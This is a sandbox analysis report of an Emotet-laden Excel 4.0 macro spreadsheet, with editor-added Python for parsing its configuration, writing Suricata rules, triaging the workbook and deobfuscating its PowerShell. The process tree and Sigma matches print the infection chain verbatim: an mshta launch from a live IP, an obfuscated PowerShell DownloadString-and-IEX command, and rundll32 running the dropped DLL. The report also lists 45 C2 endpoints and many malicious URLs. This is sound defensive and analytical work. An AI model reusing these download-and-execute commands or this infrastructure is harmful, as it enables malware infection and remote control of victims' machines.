Windows Analysis Report
CJ68000754184.xls

Overview

General Information

Sample Name: CJ68000754184.xls
Analysis ID: 562418
MD5: 84edef677d286111cb0ef9d53e0d51df
SHA1: 19548ae67f6ffec8a1c2cb9b768cb1e64d29dbcb
SHA256: 081b5ea7f6d4ce96c9c97811785f86a68809a51eaadba0928406f562ec8ea58a
Tags: SilentBuilder, xls

Detection

Hidden Macro 4.0 Emotet
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2792 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2916 cmdline: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2812 cmdline: mshta http://91.240.118.172/gg/ff/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2712 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2552 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2196 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2240 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2032 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1068 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2076 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration (Emotet)

{"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
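Worked example (added by the editor; it is not part of the Joe Sandbox report and not Emotet's or Joe Security's code). The configuration above is what a responder actually consumes, so the Python below turns it into blocklist-ready facts and checks the two "Public Key" blobs rather than treating them as opaque strings. It assumes, from the base64 prefixes (RUNL… decodes to ECK1, RUNT… to ECS1), that the keys are Windows CNG BCRYPT_ECCKEY_BLOB structures: a 4-byte magic (ECK1 = ECDH P-256 public key, ECS1 = ECDSA P-256 public key), a 4-byte little-endian key length of 32, then X and Y as big-endian integers. It verifies that each decoded point actually lies on NIST P-256, which catches a truncated or corrupted extraction. The CONFIG constant is a copy of the JSON above; the Suricata rule text and the sid range 9000001 upward are the editor's own choices.

```python
import base64
import struct
from collections import Counter

# Constructed copy of the configuration the sandbox extracted from
# 12.2.rundll32.exe.1b0000.1.unpack (the JSON printed above).
CONFIG = {
    "C2 list": [
        "160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080",
        "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443",
        "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080",
        "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080",
        "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443",
        "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080",
        "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443",
        "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443",
        "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080",
        "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080",
        "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080",
        "212.237.5.209:443",
    ],
    "Public Key": [
        "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2",
        "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5",
    ],
}

# NIST P-256: y^2 = x^3 - 3x + b (mod p). Used only to check that a blob really
# carries a point on the curve and is not a truncated or corrupted extraction.
P256_P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
P256_B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b

# BCRYPT_ECCKEY_BLOB (Windows CNG): 4-byte magic, 4-byte little-endian key length,
# then X and Y as big-endian integers of that length. Assumption for this example:
# the extracted keys use exactly this layout (the base64 prefixes decode to the magics).
MAGICS = {b"ECK1": "ECDH public key, P-256", b"ECS1": "ECDSA public key, P-256"}


def parse_bcrypt_ecc_blob(b64):
    """Decode one base64 BCRYPT_ECCKEY_BLOB and sanity-check the point."""
    blob = base64.b64decode(b64)
    magic = blob[:4]
    cb_key = struct.unpack_from("<I", blob, 4)[0]
    if magic not in MAGICS or len(blob) != 8 + 2 * cb_key:
        raise ValueError("not a P-256 BCRYPT_ECCKEY_BLOB public key: %r" % magic)
    x = int.from_bytes(blob[8:8 + cb_key], "big")
    y = int.from_bytes(blob[8 + cb_key:8 + 2 * cb_key], "big")
    on_curve = (y * y - (x * x * x - 3 * x + P256_B)) % P256_P == 0
    return {"magic": magic.decode("ascii"), "use": MAGICS[magic], "key_bytes": cb_key,
            "x": x, "y": y, "on_curve": on_curve}


def summarize(config):
    """Turn the extracted config into responder-ready facts."""
    c2 = [(host, int(port)) for host, port in (e.rsplit(":", 1) for e in config["C2 list"])]
    return {
        "c2_count": len(c2),
        "c2": c2,
        "ports": dict(Counter(port for _, port in c2)),   # which ports the bot will try
        "unique_ips": sorted({host for host, _ in c2}),   # blocklist input
        "keys": [parse_bcrypt_ecc_blob(k) for k in config["Public Key"]],
    }


def suricata_rules(summary, sid_base=9000000):
    """One outbound rule per C2 endpoint; the sid range is an arbitrary local choice."""
    return [
        'alert tcp $HOME_NET any -> %s %d (msg:"Emotet C2 %s:%d"; flow:to_server,established; '
        'sid:%d; rev:1;)' % (host, port, host, port, sid_base + i + 1)
        for i, (host, port) in enumerate(summary["c2"])
    ]


if __name__ == "__main__":
    s = summarize(CONFIG)
    print("%d C2 endpoints, ports: %s" % (s["c2_count"], s["ports"]))
    for k in s["keys"]:
        print(k["magic"], k["use"], "on P-256:", k["on_curve"])
    print("\n".join(suricata_rules(s)[:3]))
```

The port histogram is worth a look before writing egress rules: this build spreads its 45 endpoints over 443, 8080, 7080 and 80, so a web proxy that only inspects 80/443 misses more than half of the list. Two distinct key types is also a useful fingerprint: one ECDH key for agreeing the traffic key and one ECDSA key for verifying what the server sends back.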
Yara Overview

Initial sample
Source: CJ68000754184.xls | Rule: SUSP_Excel4Macro_AutoOpen | Description: Detects Excel4 macro use with auto open / close | Author: John Lambert @JohnLaTwC | Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x12ca2:$s1: Excel
  • 0x13d08:$s1: Excel
  • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source: CJ68000754184.xls | Rule: JoeSecurity_XlsWithMacro4 | Description: Yara detected Xls With Macro 4.0 | Author: Joe Security

Dropped files
Source: C:\Users\user\Desktop\CJ68000754184.xls | Rule: SUSP_Excel4Macro_AutoOpen | Description: Detects Excel4 macro use with auto open / close | Author: John Lambert @JohnLaTwC | Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x12ca2:$s1: Excel
  • 0x13d08:$s1: Excel
  • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source: C:\Users\user\Desktop\CJ68000754184.xls | Rule: JoeSecurity_XlsWithMacro4 | Description: Yara detected Xls With Macro 4.0 | Author: Joe Security
Source: C:\ProgramData\JooSee.dll | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security

Memory dumps (47 matches in total; first 5 listed)
Source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security

Unpacked PEs (70 matches in total; first 5 listed)
Source: 10.2.rundll32.exe.340000.0.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 12.2.rundll32.exe.1b0000.1.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 13.2.rundll32.exe.1b0000.0.raw.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 15.2.rundll32.exe.4b0000.3.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 10.2.rundll32.exe.2410000.8.raw.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
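Worked example (added by the editor; not part of the report and not John Lambert's rule or Joe Security's code). The $Auto_Open string the SUSP_Excel4Macro_AutoOpen rule matched at 0x32a6 is a BIFF8 Lbl (DEFINEDNAME) record read straight out of the Workbook stream: record id 0x0018, length 0x17, grbit 0x0020 (fBuiltin set, fHidden clear), cch 1, cce 7, a one-byte built-in name 0x01 meaning Auto_Open, and a formula that starts with ptgRef3d (0x3A), the token that points at the cell where execution begins. The Python below walks a Workbook Globals substream, decodes BOUNDSHEET records (sheet type and visibility, which is what "Found a hidden Excel 4.0 Macro sheet" refers to) and Lbl records (built-in names), and reports anything that auto-executes. SAMPLE_STREAM is constructed: two BOUNDSHEET records and the Lbl record byte-for-byte as the rule hit shows it, with the six ptgRef3d operand bytes after 0x3A, which the report does not contain, set to zero.

```python
import struct

# BIFF8 record ids that matter for Excel 4.0 (XLM) macro triage.
BOUNDSHEET = 0x0085   # one per sheet: substream offset, visibility, sheet type, name
LBL = 0x0018          # DEFINEDNAME; built-in names such as Auto_Open live here
EOF = 0x000A          # the first EOF closes the Workbook Globals substream

# Built-in name ids from the MS-XLS Lbl record: the single name byte is the id.
BUILTIN_NAMES = {0: "Consolidate_Area", 1: "Auto_Open", 2: "Auto_Close", 3: "Extract",
                 4: "Database", 5: "Criteria", 6: "Print_Area", 7: "Print_Titles",
                 8: "Recorder", 9: "Data_Form", 10: "Auto_Activate", 11: "Auto_Deactivate",
                 12: "Sheet_Title", 13: "_FilterDatabase"}
AUTO_EXEC = {"Auto_Open", "Auto_Close", "Auto_Activate", "Auto_Deactivate"}
VISIBILITY = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPE = {0: "worksheet", 1: "macro sheet", 2: "chart", 6: "vba module"}


def iter_records(stream):
    """Yield (record id, payload) for a BIFF record stream; stops on truncation."""
    off = 0
    while off + 4 <= len(stream):
        rid, rlen = struct.unpack_from("<HH", stream, off)
        yield rid, stream[off + 4:off + 4 + rlen]
        off += 4 + rlen


def _xl_string(buf, cch):
    """Flag byte followed by cch characters, 8-bit latin-1 or UTF-16LE (bit 0 of the flag)."""
    if buf[0] & 1:
        return buf[1:1 + 2 * cch].decode("utf-16-le"), 1 + 2 * cch
    return buf[1:1 + cch].decode("latin-1"), 1 + cch


def _col_letters(col):
    s = ""
    col += 1
    while col:
        col, rem = divmod(col - 1, 26)
        s = chr(65 + rem) + s
    return s


def parse_boundsheet(body):
    """lbPlyPos, hsState, dt, then a ShortXLUnicodeString (cch, flags, chars)."""
    pos, hs_state, dt, cch = struct.unpack_from("<IBBB", body, 0)
    name, _ = _xl_string(body[7:], cch)
    return {"name": name, "offset": pos,
            "visibility": VISIBILITY.get(hs_state, hex(hs_state)),
            "type": SHEET_TYPE.get(dt, hex(dt))}


def parse_lbl(body):
    """grbit, chKey, cch, cce, ixals, itab, 4 reserved bytes, name, then cce bytes of formula."""
    grbit, _ch_key, cch, cce, _ixals, itab = struct.unpack_from("<HBBHHH", body, 0)
    name, used = _xl_string(body[14:], cch)
    builtin = bool(grbit & 0x0020)
    if builtin and cch == 1:
        name = BUILTIN_NAMES.get(ord(name[0]), "builtin_%02x" % ord(name[0]))
    rgce = body[14 + used:14 + used + cce]
    info = {"name": name, "builtin": builtin, "hidden": bool(grbit & 0x0001),
            "scope": "workbook" if itab == 0 else "sheet %d" % itab,
            "ptg": rgce[:1].hex()}
    if rgce[:1] == b"\x3a" and len(rgce) >= 7:     # ptgRef3d: ixti, row, column
        ixti, row, col = struct.unpack_from("<HHH", rgce, 1)
        info["target"] = "%s%d (EXTERNSHEET index %d)" % (_col_letters(col & 0x3FFF), row + 1, ixti)
    return info


def triage(stream):
    """Sheets, defined names, and the two findings an analyst wants first."""
    sheets, names = [], []
    for rid, body in iter_records(stream):
        if rid == BOUNDSHEET:
            sheets.append(parse_boundsheet(body))
        elif rid == LBL:
            names.append(parse_lbl(body))
        elif rid == EOF:
            break
    return {"sheets": sheets, "names": names,
            "hidden_macro_sheets": [s["name"] for s in sheets
                                    if s["type"] == "macro sheet" and s["visibility"] != "visible"],
            "auto_exec_names": [n["name"] for n in names if n["name"] in AUTO_EXEC]}


def _rec(rid, body):
    return struct.pack("<HH", rid, len(body)) + body


def _boundsheet(name, hs_state, dt):
    raw = name.encode("latin-1")
    return _rec(BOUNDSHEET, struct.pack("<IBBBB", 0, hs_state, dt, len(raw), 0) + raw)


# Constructed Workbook Globals fragment: a visible worksheet, a very-hidden XLM sheet,
# and the Auto_Open Lbl record exactly as the $Auto_Open string matched it at 0x32a6.
# The six ptgRef3d operand bytes after 0x3A are not in the report; zero here (A1, ixti 0).
SAMPLE_STREAM = (
    _boundsheet("Sheet1", 0, 0)
    + _boundsheet("Macro1", 2, 1)
    + bytes.fromhex("18001700200000010700000000000000000000013A" "000000000000")
    + _rec(EOF, b"")
)

if __name__ == "__main__":
    r = triage(SAMPLE_STREAM)
    print("hidden macro sheets:", r["hidden_macro_sheets"])
    print("auto-exec names:", r["auto_exec_names"], r["names"][0].get("target"))
```

To run this on the real document, read the Workbook stream out of the OLE2 container (for instance `olefile.OleFileIO(path).openstream("Workbook").read()`) and pass those bytes to triage(); the offset returned for each sheet is where that sheet's own substream starts, so you can seek there and dump its FORMULA records to see the macro itself. Note the two separate signals: the name flag in the rule hit is not fHidden, it is the BOUNDSHEET state of the macro sheet that makes the macro invisible in the Excel UI.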

System Summary

Sigma rule matches (the "Sigma detected" signatures listed above):

Source: File created | Author: Florian Roth | Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2812, TargetFilename: C:\Users\user\AppData\Local

Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X (CommandLine and ProcessCommandLine carry the same string), CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessId: 2408

Source: Process started | Author: Florian Roth | Data: Command: mshta http://91.240.118.172/gg/ff/fe.html (CommandLine and ProcessCommandLine identical), CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2916, ProcessId: 2812

Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html (CommandLine and ProcessCommandLine identical), CommandLine|base64offset|contains: (empty), Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2792, ProcessId: 2916

Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) | Data: the same powershell.exe process-start event as in the Michael Haag match above (ProcessId 2408, ParentImage C:\Windows\System32\mshta.exe, ParentProcessId 2812, CommandLine|base64offset|contains: z+)

Source: Process started | Author: Florian Roth | Data: the same powershell.exe process-start event (ProcessId 2408, ParentProcessId 2812, CommandLine|base64offset|contains: z+)

Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: the same powershell.exe process-start event (ProcessId 2408, ParentProcessId 2812, CommandLine|base64offset|contains: z+)
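Worked example (added by the editor; not part of the report). The powershell.exe command line that four Sigma rules matched is a string-splice obfuscation: each fragment is a PowerShell single-quoted literal with the junk token {FdrggvdRf} spliced in, the token is stripped at run time by .replace(), the fragments are concatenated with -Join, and the result is executed twice (I`E`X $JI|I`E`X: the first Invoke-Expression runs the DownloadString call, the second runs whatever the server returns for fe.png, which per the process tree is the stage that writes C:\ProgramData\JooSee.dll and runs it through rundll32.exe). The Python below recovers the stage-1 string statically, without a PowerShell interpreter, and reads the junk token from the .replace() arguments instead of hard-coding it, so it is not tied to this particular token. CMDLINE is a copy of the script body from the PID 2408 command line with the process path and -noexit dropped; nothing is fetched from the URL.

```python
import re

# Constructed copy of the script body from the powershell.exe command line
# recorded for PID 2408 (process path and "-noexit" dropped).
CMDLINE = (
    "$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec"
    "{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'"
    ".replace('{FdrggvdRf}', ''); "
    "$c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}"
    "{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'"
    ".replace('{FdrggvdRf}', ''); "
    "$c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}"
    "(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'"
    ".replace('{FdrggvdRf}', '');"
    "$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"
)

# One  $name='literal'.replace('junk', 'repl')  statement. Inside a PowerShell
# single-quoted literal the only escape is a doubled quote, so the body is
# "any non-quote character, or two quotes in a row".
_LITERAL = r"(?:[^']|'')*"
_ASSIGN_RE = re.compile(
    r"\$(\w+)='(%s)'\.replace\('(%s)',\s*'(%s)'\)" % (_LITERAL, _LITERAL, _LITERAL))
_JOIN_RE = re.compile(r"\((\$\w+(?:,\s*\$\w+)*)\s+-Join\s+''\)")


def _unquote(literal):
    """Resolve the '' escape of a single-quoted PowerShell literal."""
    return literal.replace("''", "'")


def deobfuscate(cmdline):
    """Statically evaluate the splice-and-join and return what IEX would receive."""
    # 1. Evaluate every fragment the way PowerShell would: parse the literal,
    #    then apply the .replace() that strips the junk token.
    parts = {}
    for name, body, junk, repl in _ASSIGN_RE.findall(cmdline):
        parts[name] = _unquote(body).replace(_unquote(junk), _unquote(repl))
    # 2. Concatenate the fragments in the order the -Join expression names them
    #    (the variables are defined as c1, c4, c3, deliberately out of order).
    join = _JOIN_RE.search(cmdline)
    order = [v.strip().lstrip("$") for v in join.group(1).split(",")] if join else sorted(parts)
    stage1 = "".join(parts[n] for n in order)
    # 3. Count Invoke-Expression calls after the join; PowerShell ignores backticks
    #    inside a bare word, so I`E`X is just IEX.
    tail = cmdline[join.end():] if join else ""
    iex_count = len(re.findall(r"\bIEX\b", tail.replace("`", ""), flags=re.I))
    url = re.search(r"https?://[^\s'\")]+", stage1)
    return {"parts": parts, "stage1": stage1,
            "fetch_url": url.group(0) if url else None, "iex_count": iex_count}


if __name__ == "__main__":
    r = deobfuscate(CMDLINE)
    print(r["stage1"])
    print("fetches %s, then IEX runs %d times" % (r["fetch_url"], r["iex_count"]))
```

The recovered stage-1 string is (New-Object Net.WebClient).DownloadString('http://91.240.118.172/gg/ff/fe.png'), which is why the report flags both "HTTP GET or POST without a user agent" (WebClient sends none by default) and "Downloads executable code via HTTP". For detection, the two robust signals in this command line are the IEX pipe (an expression whose output is itself executed) and a .replace() whose first argument never appears in legitimate scripts; matching on the token itself is brittle because it is regenerated per build.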

AV Detection

Source: http://maxtdeveloper.com/okw9yx/ | Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/ | Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/PE3 | Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/f | Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3 | Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/ | Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3 | Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/ | Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.png | Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3 | Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-adm | Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/ | Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/ | Avira URL Cloud: Label: malware
Source: http://hostfeeling.com | Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com | Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/ | Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/ | Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3 | Avira URL Cloud: Label: malware
